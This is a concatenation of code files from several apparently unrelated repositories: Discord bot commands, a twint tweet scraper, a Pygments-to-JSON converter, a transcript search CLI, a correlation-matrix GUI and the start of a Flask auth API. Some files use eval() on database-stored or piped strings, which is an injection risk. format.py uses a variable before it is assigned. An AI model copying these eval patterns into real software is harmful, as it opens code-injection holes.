try:
await self.sync()
await ctx.send("Items synced, I suppose!")
except Exception as e:
print(e)
await ctx.send("Something went wrong, I suppose!")
async def item_autocomplete(self,
interaction: discord.Interaction,
current: str,
) -> List[app_commands.Choice[str]]:
if not self.is_synced:
await self.sync()
return [
app_commands.Choice(name=item['item_name'], value=item['item_name'])
for item in self.items_list if current.lower() in item['item_name'].lower()
][:25]
@app_commands.command(name="item")
@app_commands.choices(choices=[
app_commands.Choice(name="I want to buy", value="sell"),
app_commands.Choice(name="I want to sell", value="buy"),
])
@app_commands.autocomplete(item_name=item_autocomplete)
async def get_item(self, interaction: discord.Interaction, choices: app_commands.Choice[str], item_name: str):
order_type = choices.value
item_name = " ".join([p.capitalize() for p in item_name.split(' ')])
if not self.is_synced:
await self.sync()
item_info = None
for item in self.items_list:
if item['item_name'] == item_name:
item_info = item
if item_info is not None:
url_name = item_info['url_name']
async with aiohttp.ClientSession() as session:
async with session.get(self.base_url+"/items/"+url_name) as r:
if r.status == 200:
response = await r.read()
item_detail = json.loads(response)['payload']['item']['items_in_set'][0]
else:
print("WarframeMarket down!")
trading_tax = item_detail['trading_tax'] if 'trading_tax' in item_detail.keys() else "No trading tax value"
ducats = item_detail['ducats'] if 'ducats' in item_detail.keys() else "No ducats value"
mastery_level = item_detail['mastery_level'] if 'mastery_level' in item_detail.keys() else "No mastery level"
item_description = item_detail['en']['description']
wikilink = item_detail['en']['wiki_link']
drop_list = item_detail['en']['drop']
desc = f"Requires mastery rank {mastery_level}\n"
desc += f"Trading tax: {trading_tax}, Ducats value: {ducats}\n"
desc += f"```{item_description}```\n"
desc += f"Drops from " if len(drop_list)>0 else ""
for i in range(len(drop_list)):
desc += drop_list[i]['name']+', ' if i < len(drop_list)-1 else drop_list[i]['name']
async with aiohttp.ClientSession() as session:
async with session.get(self.base_url+"/items/"+url_name+"/orders") as r:
if r.status == 200:
response = await r.read()
orders = json.loads(response)['payload']['orders']
online_orders = [o for o in orders if o['user']['status'] != 'offline']
filtered_types = [o for o in online_orders if o['order_type'] == order_type]
orders_sorted = sorted(filtered_types, key = lambda ele: ele['platinum']) if order_type != 'buy' else sorted(filtered_types, key = lambda ele: ele['platinum'], reverse=True)
else:
print("WarframeMarket down!")
for i in range(len(orders_sorted)):
if i>4:
break
desc += f"\n\nPrice: {orders_sorted[i]['platinum']} plat, Quantity: {orders_sorted[i]['quantity']}, Order type: {orders_sorted[i]['order_type']}\n"
desc += f"by {orders_sorted[i]['user']['ingame_name']}\n"
desc += f"```/w {orders_sorted[i]['user']['ingame_name']} Hi! I want to {orders_sorted[i]['order_type']}: {item_name} for {orders_sorted[i]['platinum']} platinum. (warframe.market)```\n"
embed = discord.Embed(
color=discord.Colour.random(),
title=item_info['item_name'],
url=wikilink,
description=desc,
)
embed.set_thumbnail(url=self.image_url+"/"+item_info['thumb'])
await interaction.response.send_message(embed=embed)
else:
await interaction.response.send_message("I couldn't find that item, in fact!")
async def setup(bot: commands.Bot):
await bot.add_cog(WarframeMarket(bot))
```
#### File: commands/db/r_remove_channel.py
```python
import pymongo
import os
import asyncio
from dotenv import load_dotenv
from commands.db.classes.MangaDex import MangaDex
from pymongo.errors import ConnectionFailure
load_dotenv()
client = pymongo.MongoClient('localhost', 27017)
try:
client.admin.command('ping')
except ConnectionFailure:
print("Local not available")
client = pymongo.MongoClient(os.getenv("DB_URL"))
# chapter db
db_chapter = client.chapter
# channels data
channels_md = db_chapter.data_mangadex
async def commands_remove_channel(bot, i, series_obj):
md = MangaDex()
msg = await series_obj.remove_channel(bot, i)
if isinstance(msg, list):
emojis = msg[3]
manga_ids = msg[1]
titles = msg[2]
msg = msg[0]
msg = await i.channel.send(embed=msg)
await i.response.send_message("Pick a series to unfollow , in fact!")
else:
return await i.response.send_message(msg)
for j in range(len(manga_ids)):
await msg.add_reaction(emojis[j])
def check(reaction, user):
return user == i.user and reaction.message == msg
while True:
try:
reaction, user = await bot.wait_for('reaction_add', check=check, timeout=60.0)
mangas_on_channel = (channels_md.find_one(
{"channel_id": str(i.channel_id)}))['mangas']
mangas_dict = eval(mangas_on_channel)
idx = 0
for j, emoji in enumerate(emojis):
if emoji == str(reaction):
idx = j
break
if str(reaction) == emojis[idx]:
if manga_ids[idx] in mangas_dict:
mangas_dict.pop(manga_ids[idx])
new_doc = channels_md.find_one_and_update(
{'channel_id': str(i.channel_id)},
{
'$set': {
'mangas': str(mangas_dict)
}
},
return_document=pymongo.ReturnDocument.AFTER
)
title = titles[idx]
await i.channel.send(f"This channel will no longer receive notifications on new chapters of {title}, I suppose!")
except asyncio.TimeoutError:
await msg.clear_reactions()
await msg.reply("I'm not accepting any unfollow requests anymore, in fact!")
break
``` |
{
"source": "3nws/re-zero-translation-notifier-bot",
"score": 3
} |
#### File: re-zero-translation-notifier-bot/commands/r_avatar.py
```python
import discord
async def commands_avatar(ctx, member):
avatar_frame = discord.Embed(
color = discord.Colour.random()
)
if member:
avatar_frame.add_field(name=str(ctx.author)+" requested", value=member.mention+"'s avatar, I suppose!")
avatar_frame.set_image(url=f'{member.avatar_url}')
else:
avatar_frame.add_field(name=str(ctx.author)+" requested", value=" their own avatar, I suppose!")
avatar_frame.set_image(url=f'{ctx.author.avatar_url}')
await ctx.send(embed=avatar_frame)
```
#### File: re-zero-translation-notifier-bot/commands/r_coinflip.py
```python
import random
import discord
from random import choice
determine_flip = [1, 0]
async def commands_coinflip(ctx, heads, tails):
if heads is not None and tails is None:
embed = discord.Embed(title="Error", description=f"{ctx.author.mention} tried to flip a coin but didn't specify what for is tails, I suppose!")
await ctx.send(embed=embed)
elif heads is None or tails is None:
if random.choice(determine_flip) == 1:
embed = discord.Embed(title="Coinflip", description=f"{ctx.author.mention} flipped a coin, and got **Heads**, I suppose!")
await ctx.send(embed=embed)
else:
embed = discord.Embed(title="Coinflip", description=f"{ctx.author.mention} flipped a coin, and got **Tails**, I suppose!")
await ctx.send(embed=embed)
else:
if random.choice(determine_flip) == 1:
embed = discord.Embed(title="Coinflip", description=f"{ctx.author.mention} flipped a coin, and got **Heads** for **{heads}**, I suppose!")
await ctx.send(embed=embed)
else:
embed = discord.Embed(title="Coinflip", description=f"{ctx.author.mention} flipped a coin, and got **Tails** for **{tails}**, I suppose!")
await ctx.send(embed=embed)
```
#### File: re-zero-translation-notifier-bot/commands/r_roll.py
```python
import random
async def commands_roll(ctx, num):
if num.isnumeric():
number = random.randint(1, int(num))
else:
number = random.randint(1, 100)
await ctx.send(f"{ctx.message.author.name} Just rolled **{number}**, I suppose!")
```
#### File: re-zero-translation-notifier-bot/commands/r_series.py
```python
import discord
async def commands_series(ctx):
series = [
"Kaguya-sama: Love is War (kaguya)",
"Oshi no Ko (onk)",
"Re:Zero (rz)"
]
frame = discord.Embed(
color = discord.Colour.random()
)
counter = 1
desc = ""
for s in series:
desc += f"**{counter}.** {s}\n"
counter += 1
frame.description = desc
await ctx.send(embed=frame)
``` |
{
"source": "3nws/twint",
"score": 3
} |
#### File: 3nws/twint/main.py
```python
import twint
import joblib
from datetime import datetime
def get_real_time():
now = datetime.utcnow()
year = now.year
month = now.month
day = now.day
hour = now.hour
if hour < 10:
hour = "0"+str(hour)
minute = now.minute
if minute < 10:
minute = "0"+str(minute)
second = now.second
date_format = str(year)+"-"+str(month)+"-"+str(day)+" " + \
str(hour)+":"+str(minute)+":"+str(second)
return date_format
# Configure
c = twint.Config()
# c.Database = "covid.db"
# c.Search = "ukraine OR russia OR russian invasion OR ukraine war OR russian war OR zelensky OR putin OR vladimir putin OR volodymyr zelensky OR ukraine russia OR defence of ukraine"
c.Search = "Украина"
# c.Search = "corona"
# c.Search = "Sputnik OR gamaleya vaccine OR Sputnik V"
# c.Search = "Sinopharm OR Sinopharm OR Sinopharm vaccine OR Sinopharm BIBP"
# c.Search = "moderna OR spikevax"
# c.Search = "Janssen OR Johnson & Johnson vaccine"
# c.Search = "Pfizer–BioNTech OR biontech OR pfizer OR Pfizer BioNTech"
# c.Search = "Oxford–AstraZeneca OR astrazeneca OR oxford vaccine OR Vaxzevria OR Covishield"
# c.Since = get_real_time()
c.Since = "2022-2-24"
# c.Since = "2020-2-24"
# c.Until = get_real_time()
# c.Lang = "en"
c.Lang = "ru"
c.Translate = True
c.TranslateDest = "en"
# c.Limit = 50
c.Count = True
c.Store_csv = True
c.Store_object = True
c.Output = "war-russian.csv"
# Run
twint.run.Search(c)
# tweets = twint.output.tweets_list
# # joblib.dump(tweets, './tweets.pkl')
# for i in range(len(tweets)):
# c = twint.Config()
# c.User_id = tweets[i].user_id
# print(605203235)
# c.Store_object = True
# c.User_full = True
# twint.run.Lookup(c)
# user_location = twint.output.users_list[0].location if 'location' in twint.output.users_list[0].__dict__.keys() else "-"
```
#### File: twint/twint/format.py
```python
import logging as logme
def Tweet(config, t):
if config.Format:
logme.debug(__name__+':Tweet:Format')
# output = config.Format.replace("{id}", str(t.id_str))
# output = output.replace("{conversation_id}", str(t.conversation_id))
# output = output.replace("{date}", str(t.datestamp))
# output = output.replace("{time}", str(t.timestamp))
output = output.replace("{user_id}", str(t.user_id_str))
output = output.replace("{username}", t.username)
# output = output.replace("{name}", str(t.name))
# output = output.replace("{place}", t.place)
# output = output.replace("{timezone}", str(t.timezone))
# output = output.replace("{urls}", ",".join(str(t.urls)))
# output = output.replace("{photos}", ",".join(str(t.photos)))
# output = output.replace("{video}", str(t.video))
# output = output.replace("{thumbnail}", str(t.thumbnail))
output = output.replace("{tweet}", t.tweet)
output = output.replace("{language}", str(t.lang))
# output = output.replace("{hashtags}", ",".join(str(t.hashtags)))
# output = output.replace("{cashtags}", ",".join(str(t.cashtags)))
# output = output.replace("{replies}", str(t.replies_count))
# output = output.replace("{retweets}", str(t.retweets_count))
# output = output.replace("{likes}", str(t.likes_count))
# output = output.replace("{link}", str(t.link))
# output = output.replace("{is_retweet}", str(t.retweet))
# output = output.replace("{user_rt_id}", str(t.user_rt_id))
# output = output.replace("{quote_url}", str(t.quote_url))
# output = output.replace("{near}", t.near)
# output = output.replace("{geo}", t.geo)
# output = output.replace("{mentions}", ",".join(str(t.mentions)))
output = output.replace("{translate}", t.translate)
output = output.replace("{trans_src}", t.trans_src)
output = output.replace("{trans_dest}", t.trans_dest)
else:
logme.debug(__name__+':Tweet:notFormat')
output = f"{t.id_str} {t.datestamp} {t.timestamp} {t.timezone} "
# TODO: someone who is familiar with this code, needs to take a look at what this is <also see tweet.py>
# if t.retweet:
# output += "RT "
output += f"<{t.username}> {t.tweet}"
if config.Show_hashtags:
hashtags = ",".join(t.hashtags)
output += f" {hashtags}"
if config.Show_cashtags:
cashtags = ",".join(t.cashtags)
output += f" {cashtags}"
if config.Stats:
output += f" | {t.replies_count} replies {t.retweets_count} retweets {t.likes_count} likes"
if config.Translate:
output += f" {t.translate} {t.trans_src} {t.trans_dest}"
return output
def User(_format, u):
if _format:
logme.debug(__name__+':User:Format')
output = _format.replace("{id}", str(u.id))
# output = output.replace("{name}", u.name)
output = output.replace("{username}", u.username)
# output = output.replace("{bio}", u.bio)
output = output.replace("{location}", u.location)
# output = output.replace("{url}", u.url)
# output = output.replace("{join_date}", u.join_date)
# output = output.replace("{join_time}", u.join_time)
# output = output.replace("{tweets}", str(u.tweets))
# output = output.replace("{following}", str(u.following))
# output = output.replace("{followers}", str(u.followers))
# output = output.replace("{likes}", str(u.likes))
# output = output.replace("{media}", str(u.media_count))
# output = output.replace("{private}", str(u.is_private))
# output = output.replace("{verified}", str(u.is_verified))
# output = output.replace("{avatar}", u.avatar)
# if u.background_image:
# output = output.replace("{background_image}", u.background_image)
# else:
# output = output.replace("{background_image}", "")
else:
logme.debug(__name__+':User:notFormat')
output = f"{u.id} | @{u.username}"
output += f"Location: {u.location}"
return output
```
#### File: twint/storage/write_meta.py
```python
import string
import re
from nltk.corpus import stopwords
import re
import string
import nltk
import twint
import nest_asyncio
nest_asyncio.apply()
# __import__('IPython').embed()
from nltk.stem.snowball import SnowballStemmer
from nltk.tokenize import TweetTokenizer, RegexpTokenizer
nltk.download('stopwords')
stemmer = SnowballStemmer("english", ignore_stopwords=True)
token = RegexpTokenizer(r'[a-zA-Z0-9]+')
# Preprocessing
RE_EMOJI = re.compile('[\U00010000-\U0010ffff]', flags=re.UNICODE)
def strip_emoji(text):
return RE_EMOJI.sub(r'', text)
def remove_URL(text):
url = re.compile(r"https?://\S+|www\.\S+")
return url.sub(r"", text)
def remove_punct(text):
translator = str.maketrans("", "", string.punctuation)
return text.translate(translator)
def remove_mention(text):
return re.sub("@[A-Za-z0-9]+", "", text)
def stem_tweets(tweet):
tokens = tweet.split()
stemmed_tokens = [stemmer.stem(token) for token in tokens]
return ' '.join(stemmed_tokens)
def lemmatize_tweets(tweet):
tokens = tweet.split()
lemmatized_tokens = [lemmatizer.lemmatize(token) for token in tokens]
return ' '.join(lemmatized_tokens)
# remove stopwords
stop = set(stopwords.words("english"))
def remove_stopwords(text):
stop = set(stopwords.words("english"))
filtered_words = [word.lower()
for word in text.split() if word.lower() not in stop]
return " ".join(filtered_words)
def preprocess_tweets(tweet):
tweet = strip_emoji(tweet)
tweet = remove_mention(tweet)
tweet = remove_URL(tweet)
tweet = remove_punct(tweet)
tweet = stem_tweets(tweet)
# tweet = lemmatize_tweets(tweet)
tweet = remove_stopwords(tweet)
return tweet
def tweetData(t):
t.tweet = t.tweet.lower()
# pre-processing
tweet_processed = preprocess_tweets(t.tweet)
will_be_removed = len(tweet_processed.split(' ')) < 3
c = twint.Config()
c.User_id = t.user_id
c.Store_object = True
c.User_full = True
twint.run.Lookup(c)
user = next((user for user in twint.output.users_list if str(user.id) == str(t.user_id)), None)
user_location = user.location if user is not None else "-"
processed_translation = preprocess_tweets(t.translate)
data = {
# "id": int(t.id),
# "conversation_id": t.conversation_id,
# "created_at": t.datetime,
# "date": t.datestamp,
# "time": t.timestamp,
# "timezone": t.timezone,
# "user_id": t.user_id,
"username": t.username,
# "name": t.name,
# "place": t.place,
"tweet": tweet_processed if not will_be_removed else "",
"OriginalTweet": t.tweet,
"sentiment": 2,
"language": t.lang,
"userid": t.user_id,
"location": user_location,
# "mentions": t.mentions,
# "urls": t.urls,
# "photos": t.photos,
# "replies_count": int(t.replies_count),
# "retweets_count": int(t.retweets_count),
# "likes_count": int(t.likes_count),
# "hashtags": t.hashtags,
# "cashtags": t.cashtags,
# "link": t.link,
# "retweet": t.retweet,
# "quote_url": t.quote_url,
# "video": t.video,
# "thumbnail": t.thumbnail,
# "near": t.near,
# "geo": t.geo,
# "source": t.source,
# "user_rt_id": t.user_rt_id,
# "user_rt": t.user_rt,
# "retweet_id": t.retweet_id,
# "reply_to": t.reply_to,
# "retweet_date": t.retweet_date,
"translate": processed_translation,
"trans_src": t.trans_src,
"trans_dest": t.trans_dest,
}
return data
def tweetFieldnames():
fieldnames = [
# "id",
# "conversation_id",
# "created_at",
# "date",
# "time",
# "timezone",
# "user_id",
"username",
# "name",
# "place",
"tweet",
"OriginalTweet",
"sentiment",
"language",
"userid",
"location",
# "mentions",
# "urls",
# "photos",
# "replies_count",
# "retweets_count",
# "likes_count",
# "hashtags",
# "cashtags",
# "link",
# "retweet",
# "quote_url",
# "video",
# "thumbnail",
# "near",
# "geo",
# "source",
# "user_rt_id",
# "user_rt",
# "retweet_id",
# "reply_to",
# "retweet_date",
"translate",
"trans_src",
"trans_dest"
]
return fieldnames
def userData(u):
data = {
"id": int(u.id),
# "name": u.name,
"username": u.username,
# "bio": u.bio,
"location": u.location,
# "url": u.url,
# "join_date": u.join_date,
# "join_time": u.join_time,
# "tweets": int(u.tweets),
# "following": int(u.following),
# "followers": int(u.followers),
# "likes": int(u.likes),
# "media": int(u.media_count),
# "private": u.is_private,
# "verified": u.is_verified,
# "profile_image_url": u.avatar,
# "background_image": u.background_image
}
return data
def userFieldnames():
fieldnames = [
"id",
# "name",
"username",
# "bio",
"location",
# "url",
# "join_date",
# "join_time",
# "tweets",
# "following",
# "followers",
# "likes",
# "media",
# "private",
# "verified",
# "profile_image_url",
# "background_image"
]
return fieldnames
def usernameData(u):
return {"username": u}
def usernameFieldnames():
return ["username"]
def Data(obj, _type):
if _type == "user":
ret = userData(obj)
elif _type == "username":
ret = usernameData(obj)
else:
ret = tweetData(obj)
return ret
def Fieldnames(_type):
if _type == "user":
ret = userFieldnames()
elif _type == "username":
ret = usernameFieldnames()
else:
ret = tweetFieldnames()
return ret
``` |
{
"source": "3ofcoins/nanodoc",
"score": 2
} |
#### File: lib/nanodoc/pygments2json.py
```python
import json
import re
import sys
TOKEN_CSS_CLASSES = { "Comment": "c",
"Error": "err",
"Keyword": "k",
"Operator": "o",
"Comment.Multiline": "cm",
"Comment.Preproc": "cp",
"Comment.Single": "c1",
"Comment.Special": "cs",
"Generic.Deleted": "gd",
"Generic.Emph": "ge",
"Generic.Error": "gr",
"Generic.Heading": "gh",
"Generic.Inserted": "gi",
"Generic.Output": "go",
"Generic.Prompt": "gp",
"Generic.Strong": "gs",
"Generic.Subheading": "gu",
"Generic.Traceback": "gt",
"Keyword.Constant": "kc",
"Keyword.Declaration": "kd",
"Keyword.Namespace": "kn",
"Keyword.Pseudo": "kp",
"Keyword.Reserved": "kr",
"Keyword.Type": "kt",
"Literal.Number": "m",
"Literal.String": "s",
"Name.Attribute": "na",
"Name.Builtin": "nb",
"Name.Class": "nc",
"Name.Constant": "no",
"Name.Decorator": "nd",
"Name.Entity": "ni",
"Name.Exception": "ne",
"Name.Function": "nf",
"Name.Label": "nl",
"Name.Namespace": "nn",
"Name.Tag": "nt",
"Name.Variable": "nv",
"Operator.Word": "ow",
"Text.Whitespace": "w",
"Literal.Number.Float": "mf",
"Literal.Number.Hex": "mh",
"Literal.Number.Integer": "mi",
"Literal.Number.Oct": "mo",
"Literal.String.Backtick": "sb",
"Literal.String.Char": "sc",
"Literal.String.Doc": "sd",
"Literal.String.Double": "s2",
"Literal.String.Escape": "se",
"Literal.String.Heredoc": "sh",
"Literal.String.Interpol": "si",
"Literal.String.Other": "sx",
"Literal.String.Regex": "sr",
"Literal.String.Single": "s1",
"Literal.String.Symbol": "ss",
"Name.Builtin.Pseudo": "bp",
"Name.Variable.Class": "vc",
"Name.Variable.Global": "vg",
"Name.Variable.Instance": "vi",
"Literal.Number.Integer.Long": "il", }
def lines2tokens(lines):
for line in lines:
token_type, text = line.split("\t", 1)
text = eval(text, {"__builtins__": None}, {})
if token_type.startswith('Token.'):
token_type = token_type[6:]
_head = True
for piece in text.split("\n"):
if not _head:
yield ["\n", 'Text.Newline']
if piece <> "":
if piece.isspace():
yield [piece, 'Text.Whitespace']
else:
yield [piece, token_type, TOKEN_CSS_CLASSES.get(token_type, None)]
_head = False
json.dump(tuple(lines2tokens(sys.stdin)), sys.stdout)
``` |
{
"source": "3ok/carpet",
"score": 3
} |
#### File: carpet/carpet/main.py
```python
import argparse
import os
from typing import Optional, Sequence
from carpet.constants import AWC_BONGO, CARPET_CACHE_FILE
from carpet.core import fetch_videos, find_video_from_text, load_videos_from_json
def fetch(force: bool) -> None:
if force or not os.path.exists(CARPET_CACHE_FILE):
print("Fetching explains videos, might take a couple of minutes ...")
fetch_videos(save=True)
print(f"Fetching results saved successfully at {CARPET_CACHE_FILE}")
else:
print(f"Fetching results already done (see {CARPET_CACHE_FILE})")
def find(text: str) -> None:
if not os.path.exists(CARPET_CACHE_FILE):
print(f"{CARPET_CACHE_FILE} does not exist, please run `carpet fetch` first")
else:
videos = load_videos_from_json()
video_info = find_video_from_text(text, videos)
if video_info is None:
print(f"No videos were found !")
else:
video, start = video_info
url = video.url_starts_at(start)
print(f"There you go ! ({video.title}) : {url}")
def main(argv: Optional[Sequence[str]] = None) -> int:
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest="command", required=True)
bongo_parser = subparsers.add_parser("bongo", help="awcBongo")
fetch_parser = subparsers.add_parser(
"fetch",
help=(
"Fetch transcripts from explains videos, may take a while. "
"This generates a .carpet.json file."
),
)
fetch_parser.add_argument(
"--force",
action="store_true",
help="Force the creation of .carpet.json even if it exists",
)
find_parser = subparsers.add_parser(
"find",
help=(
"Find a video (and corresponding timestamp) corresponding "
"to a specific input text. This suppose that .carpet.json exists."
),
)
find_parser.add_argument("text", help="text to look for")
args = parser.parse_args(argv)
if args.command == "bongo":
print(AWC_BONGO)
elif args.command == "fetch":
fetch(args.force)
elif args.command == "find":
find(args.text)
return 0
if __name__ == "__main__":
raise SystemExit(main())
``` |
{
"source": "3olich/correlation-highlighting",
"score": 3
} |
#### File: 3olich/correlation-highlighting/main.py
```python
import os.path
from sys import argv, exc_info
import design
import matplotlib.pyplot as plt
from numpy import corrcoef, seterr
from PyQt5 import QtWidgets
import xlsxwriter
def tranc(matrix):
"""
Транспонирует матрицу
matrix - матрица в формате список списков;
return - транспонированная матрица в том же формате.
"""
return list(map(list, zip(*matrix)))
def read_csv(filename, start, end):
'''
csv в привычном понимании стандартных библиотек
разделяет ячейки запятыми, а нам
на вход поступает файл с разделением ';'
'''
csv_file = open(filename, encoding='cp1251')
# Пропускаем все строки, до цикла начала
for i in range(start + 1):
next(csv_file)
matr = []
# обходим каждую строку
for num, row in enumerate(csv_file):
# Значения в csv хранятся в формате ' %d%d '
def to_int(x): return int(x.strip())
# Первые три столбца не хранят значений
vals = map(to_int, row.split(';')[3:])
matr.append(vals)
# Ограничиваем считывание
if num == end - start:
break
matr = tranc(matr)
csv_file.close()
return matr
def serializeToExcel(infile, outfile, st, end):
workbook = xlsxwriter.Workbook(outfile)
worksheet = workbook.add_worksheet()
with open(infile, 'r', encoding='cp1251') as inputed:
header_row = inputed.read().split('\n')[1]
headers = header_row.split(';')[3:]
# Это просто тут нужно
worksheet.write('J2', 'Корреляционная матрица по К.Пирсону')
worksheet.write('W1', 'Таблица')
worksheet.set_column(0, len(headers) + 1, 4)
for index, header in enumerate(headers):
# 3 для шапки
hcell = f'{chr(ord("B") + index)}3'
vcell = f'A{index + 4}'
worksheet.write(hcell, header)
worksheet.write(vcell, header)
matrix = corrcoef(read_csv(infile, st, end))
# Убираем NaN (трехзначная логика)
matrix = [[x if x == x else 0 for x in row] for row in matrix]
positive_str = workbook.add_format({'bold': True, 'font_color': 'red'})
positive_weak = workbook.add_format({'bold': False, 'font_color': 'red'})
negative_str = workbook.add_format({'bold': True, 'font_color': 'blue'})
negative_weak = workbook.add_format({'bold': False, 'font_color': 'blue'})
for num, row in enumerate(matrix):
for let, cell in enumerate(row):
if cell > 0.7:
format_ = positive_str
elif cell > 0:
format_ = positive_weak
elif cell < -0.7:
format_ = negative_str
elif cell < 0:
format_ = negative_weak
else:
format_ = workbook.add_format()
# 4 для того, чтобы можно было написать шапку
worksheet.write(f'{chr(ord("B") + let)}{num + 4}', cell, format_)
workbook.close()
class inner_scheme:
'''
Объект класса преобразовывает аппаратно-фиксированные значения в схему,
учитывая взаимную корреляцию значений
'''
# Ключ - название центра на схеме
# Значение[0] - название по - русски
# Значение[1] - порядок в исходном CSV
# Значение[2] - координата по X
# Значение[3] - координата по Y
positions = {"RP": ["Подж/сел", 0, 3, 0], "F": ["Печень", 1, -3, 0], "E": ["Желудок", 3, 4, 0],
"R": ["Почки", 8, -2, -2], "V": ["Моч.поз", 9, -3, -3], "IG": ["Тонкая кишка", 19, -2, 3],
"TR": ["Лимф. система", 14, 2, 3], "C": ["Сердце", 18, -1, 2],
"MC": ["Эндокринная система", 13, 1, 2],
"VB": ["Желчный пузырь", 7, -4, 0], "P": ["Легкие", 11, 2, -2],
"GI": ["Толстая кишка", 12, 3, -3]}
# Показывает, какие линии должны быть нанесены
lines = (("VB", "V"), ("VB", "IG"), ("VB", "C"),
("VB", "R"), ("VB", "F"), ("F", "V"),
("F", "R",), ("F", "IG"), ("F", "C"),
("F", "MC"), ("F", "P"), ("V", "R"),
("V", "GI"), ("V", "P"), ("R", "C"),
("R", "MC"), ("R", "P"), ("R", "GI"),
("R", "RP"), ("GI", "E"), ("GI", "RP"),
("GI", "P"), ("P", "C"), ("P", "MC"),
("P", "RP"), ("P", "E"), ("E", "MC"),
("E", "RP"), ("E", "TR"), ("RP", "C"),
("RP", "MC"), ("RP", "F"), ("RP", "TR"),
("MC", "C"), ("MC", "TR"), ("MC", "IG"),
("TR", "IG"), ("TR", "C"), ("IG", "C"))
def __init__(self, source, start, end, strong_corr_coeff, weak_corr_coeff):
"""Конструктор класса
Keyword arguments:
source -- исходный файл в формате csv
start -- номер цикла, с которого начинается обработка
end -- номер цикла, которым заканчивается обработка
strong_corr_coeff -- абсолютное значение корреляции,
с которого взаимодействие считается сильным
weak_corr_coef -- абсолютное значение корреляции,
меньше которого взаимодействие считается слабым
"""
if end <= start:
raise ValueError(f'Invalid cycle number: start={start}, end={end}')
if strong_corr_coeff < weak_corr_coeff:
raise ValueError(f'Invalid coeffs: strong={strong_corr_coeff}, weak={weak_corr_coeff}')
if not os.path.exists(source):
raise FileExistsError('File not found')
self.source = source
self.start_cycle = start
self.end_cycle = end
self.strong_corr_coeff = strong_corr_coeff
self.weak_corr_coeff = weak_corr_coeff
# Нужны для названия файлов
big_percent = str(int(100 * self.strong_corr_coeff))
small_percent = str(int(100 * self.weak_corr_coeff))
# Все файлы будут находиться в отдельной папке
self.result_dir = os.path.join(os.path.dirname(
os.path.abspath(source)), f'{source[:-4]}[{start}-{end}]({big_percent}-{small_percent})')
if not os.path.exists(self.result_dir):
os.makedirs(self.result_dir)
self.process()
def process(self):
self.corr = corrcoef(
read_csv(self.source, self.start_cycle, self.end_cycle))
self.draw_init()
self.draw_nodes()
self.draw_inner_edges()
self.draw_outer_edges()
self.draw_ending()
serializeToExcel(self.source, os.path.join(
self.result_dir, 'corr_matrix.xlsx'), self.start_cycle, self.end_cycle)
plt.show()
def draw_init(self):
# Создаем объект под хранение схемы
self.fig = plt.figure()
self.ax = self.fig.gca()
plt.title('Исследование корреляции')
# Отключаем видимость фрейма и координатную сетку
self.fig.patch.set_visible(False)
self.ax.axis('off')
def draw_nodes(self):
# Генерируем координаты вершин
# В Python v3+ map возвращает итератор, а для plotly нужен список
x = [node[2] for node in inner_scheme.positions.values()]
y = [node[3] for node in inner_scheme.positions.values()]
# Наносим вершины на рисунок
plt.scatter(x, y, color='gray', s=25**2, alpha=1, zorder=2, )
for center in inner_scheme.positions.keys():
# Текст отрисовывается особым образом, просто так красивее результат
def pred(x): return x-0.12
plt.text(
*map(pred, inner_scheme.positions[center][2:4]), s=center,)
def draw_inner_edges(self):
for line in inner_scheme.lines:
self.draw_edge(*line)
def draw_outer_edges(self):
pass
def draw_ending(self):
# outfile = f'{self.source[:-4]}[{self.start_cycle}-{self.end_cycle}]'
plt.savefig(os.path.join(self.result_dir, 'scheme.jpeg'))
def draw_edge(self, lhs, rhs):
x = [inner_scheme.positions[lhs][2], inner_scheme.positions[rhs][2]]
y = [inner_scheme.positions[lhs][3], inner_scheme.positions[rhs][3]]
color_positive = "red"
color_negative = "blue"
# https://matplotlib.org/examples/color/named_colors.html
color_light_negative = "skyblue"
color_light_positive = "darksalmon"
color_zero = "Black"
width_fat = 4
width_thin = 2
coeff = self.corr[inner_scheme.positions[lhs]
[1]][inner_scheme.positions[rhs][1]]
if -1 <= coeff <= - self.strong_corr_coeff:
color_ = color_negative
width_ = width_fat
elif -self.strong_corr_coeff < coeff <= -self.weak_corr_coeff:
color_ = color_negative
width_ = width_thin
elif -self.weak_corr_coeff < coeff < 0:
color_ = color_light_negative
width_ = width_thin
elif 0 < coeff < self.weak_corr_coeff:
color_ = color_light_positive
width_ = width_thin
elif self.weak_corr_coeff <= coeff < self.strong_corr_coeff:
color_ = color_positive
width_ = width_thin
elif self.strong_corr_coeff <= coeff <= 1:
color_ = color_positive
width_ = width_fat
else:
color_ = color_zero
width_ = width_thin
plt.plot(x, y, color=color_, linewidth=width_, zorder=1)
class GUI(QtWidgets.QMainWindow, design.Ui_MainWindow):
def __init__(self):
super().__init__()
self.setupUi(self)
self.fileSelector.clicked.connect(self.browse_folder)
self.goButton.clicked.connect(self.work)
def browse_folder(self):
self.fileLabel.clear()
self.filename = QtWidgets.QFileDialog.getOpenFileName(
self, "Выберите папку")
if self.filename:
self.fileLabel.setText(self.filename[0])
else:
self.warningLabel.setText("Не выбран файл!!!")
def work(self):
try:
scheme = inner_scheme(self.filename[0], self.cyclesFrom.value(
), self.cyclesTo.value(), self.strong.value(), self.wick.value())
print(self.filename[0], self.cyclesFrom.value(
), self.cyclesTo.value(), self.strong.value(), self.wick.value())
self.warningLabel.setText(
f"Все хорошо\nРезультат сохранен в {scheme.result_dir}")
except:
self.warningLabel.setText(f"Error: {exc_info()[1]}")
if '__main__' == __name__:
"""
Формула для коэффициента корреляции Пирсона делит (слово дня - нормализация)
ковариацию X и Y на произведение их стандартных отклонений.
Так как Y может иметь нулевую дисперсию,
ее стандартное отклонение также равно нулю.
Вот почему иногда появляется ошибка true_divide - деление на ноль.
Почти во всех файлах есть пара столбцов, где [100, 100, 100, 100, ..]
При небольшом количестве циклов вылетает в аут.
"""
seterr(divide='ignore', invalid='ignore')
app = QtWidgets.QApplication(argv)
window = GUI()
window.show()
app.exec_()
``` |
{
"source": "3omer/zelite",
"score": 2
} |
#### File: app/API/authAPI.py
```python
import re
from flask import request, jsonify
from flask_jwt_extended import jwt_required, create_access_token, get_raw_jwt
from app import app, jwt_manager
from app.models import RevokedToken, User, NotUniqueError, ValidationError
from app.JSONSchemas import UserSchema, ValidationError
from app.mailService import send_verification_mail
# initialize jwt loader
@jwt_manager.token_in_blacklist_loader
def token_black_listed_loader(dec_token):
jti = dec_token["jti"]
return RevokedToken.is_blacklisted(jti)
@app.route("/api/v1/register", methods=["POST"])
def register():
user_schema = UserSchema()
if request.method == "POST":
json_data = request.get_json()
try:
user_schema.load(json_data)
